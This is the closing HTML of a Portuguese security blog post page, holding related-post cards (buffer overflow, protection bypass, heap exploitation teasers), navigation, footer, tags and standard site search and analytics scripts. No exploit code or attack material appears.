class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/std-bof/"><div class="card-body"> <span class="timeago small" >Sep 26, 2021<i class="unloaded">2021-09-26T10:00:00-03:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Linux Buffer Overflow - Parte 1 Shellcode em Assembly</h3><div class="text-muted small"><p> RESUMO Este estudo apresenta as técnicas necessárias para endendimento e desenvolvimento de exploits para exploração de binários. O estudo foi realizado com método prático utilizando a linguagem A...</p></div></div></a></div><div class="card"> <a href="/posts/std-bof-3/"><div class="card-body"> <span class="timeago small" >Sep 27, 2021<i class="unloaded">2021-09-27T12:00:00-03:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Linux Buffer Overflow - Parte 3 Bypass de Proteções</h3><div class="text-muted small"><p> Dando continuidade ao estudo sobre buffer overflow, nesta parte iniciaremos o bypass das principais proteções impostas na comipalção e pelo SO. Bypass de proteções e exploração remota Conforme os...</p></div></div></a></div><div class="card"> <a href="/posts/paper-heap/"><div class="card-body"> <span class="timeago small" >May 10, 2022<i class="unloaded">2022-05-10T01:00:00-03:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Heap Exploitation P.1</h3><div class="text-muted small"><p> RESUMO Este estudo apresenta uma introdução às técnicas de exploração de memória dinâmica em binários para o sistema operacional Linux. Ao final deste laboratório, foi possível compreender a arqui...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/std-bof/" class="btn btn-outline-primary" prompt="Older"><p>Linux Buffer Overflow - Parte 1 Shellcode em Assembly</p></a> <a href="/posts/std-bof-3/" class="btn btn-outline-primary" prompt="Newer"><p>Linux Buffer Overflow - Parte 3 Bypass de Proteções</p></a></div></div></div></div><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2025 <a href="https://github.com/h41stur">H41stur</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/tags/linux/">Linux</a> <a class="post-tag" href="/tags/windows/">Windows</a> <a class="post-tag" href="/tags/assembly/">Assembly</a> <a class="post-tag" href="/tags/binary-exploitation/">Binary Exploitation</a> <a class="post-tag" href="/tags/buffer-overflow/">Buffer Overflow</a> <a class="post-tag" href="/tags/web/">Web</a> <a class="post-tag" href="/tags/htb/">HTB</a> <a class="post-tag" href="/tags/vulnserver/">Vulnserver</a> <a class="post-tag" href="/tags/android/">Android</a> <a class="post-tag" href="/tags/kernel/">Kernel</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="https://h41stur.github.io{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script src="https://cdn.jsdelivr.net/combine/npm/lozad/dist/lozad.min.js,npm/magnific-popup@1/dist/jquery.magnific-popup.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.16.1,npm/bootstrap@4/dist/js/bootstrap.min.js"></script> <script defer src="/app.js"></script> <script defer src="https://www.googletagmanager.com/gtag/js?id="></script> <script> document.addEventListener("DOMContentLoaded", function(event) { window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', ''); }); </script>
